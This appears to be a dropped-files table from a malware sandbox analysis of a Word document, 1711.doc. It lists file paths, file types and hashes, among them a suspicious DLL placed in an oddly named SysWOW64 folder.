C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	402FBE97FF53FDDFCC16C3CDDAC78C6E	1BA91D5F4D6D7C813B536BD40AFEA20A363CD8E3	5660CB335217D3ADB7B7321855F49AC2C6F4DC3CF4477DEF5A043111403075A0
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	3D6C80467F22055400A5B30D4DD9598D	1172A3029D2657F4581F5A886290AA31B559EEA7	F2E88E2537FEC66D4F3EBD4450F6C8207E439C8526B049F8CA6501481F911A11
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivljvnov.dnx.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjtsltui.gs0.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP	Composite Document File V2 Document, Cannot read section info	D371FE31D4F951D5BD8A57F7072AA424	50EA1D2D815EC7B071B4A3388CFA4229928D942A	12342D67B505C694831D87F4F3A742987C3DE00565E1DC0354D3951FBFF7E918
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1711.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:09 2020, mtime=Mon Nov 22 18:01:14 2021, atime=Mon Nov 22 18:01:11 2021, length=135948, window=hide	9C0FA7A9D0CE752EE3B4F30AFB49BA47	B964316B0F8C8D20AAF8CCB4C670893CC2B0880D	DADE1806B80DE63CEBCF92FF6DBBB983F7C094AC08E9047B20E7FA41EF960F0E
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	38B1B69A7D2D3E1C386BC4E37CB0A52B	F761BA2E5930369A2AE6B055664B1E06E53E3646	EE6611A14ABADA654761586768A652637235A616AF1030FD8BC52EA555FFF18C
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	46F4823949A556BFEA5B765EBD42BB64	BA9BDFC155426C1D1EA12E43BF94B6BB0EF6C3F0	6D360F9F02CE1A909EE4C4329105282430A97C95A91943A8303AD19BD6E3F2A2
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC	Little-endian UTF-16 Unicode text, with CR line terminators	C4F79900719F08A6F11287E3C7991493	754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D	625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
C:\Users\user\Desktop\~$1711.doc	data	46F4823949A556BFEA5B765EBD42BB64	BA9BDFC155426C1D1EA12E43BF94B6BB0EF6C3F0	6D360F9F02CE1A909EE4C4329105282430A97C95A91943A8303AD19BD6E3F2A2
C:\Users\user\Documents\20211122\PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	CE9C3E936CA194A99E6527EB5E631358	208B7F23A6F20232174437F051EE1C94FD2E196A	A452D65B472CB605519456B0DC34426B1E9868B82E1BECF69067D40005A92821
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	ASCII text, with no line terminators	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators	D0F6C98FB282DF59111DB522D6E9108B	809FA55C7EB553FB09B8035DB2A92EDB60B799E8	6FDC668D8B86845B76461C63DA8F7DBB10204D557D9F46A36D14855A6CFC4B9F
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211122_190130_406.etl	data	83F6606FCBD342F5D823A014F0F2702F	5A8E3060F13E0D7F9DD148B3199F486B5F79EEA9	F9807DBCF7698CA1DECCEA377A9794482E46F0A95D1300DBC56262F9221894BB
C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	6ED0F0B0046573CFBA56C98152B44F28	53FC583339C441DFFBFCF2C2F1F660C1CAD96714	A84F4C76EF86D165088979CB91506B65C3D84CB92386E3AA68EABA4EFE0C9B5E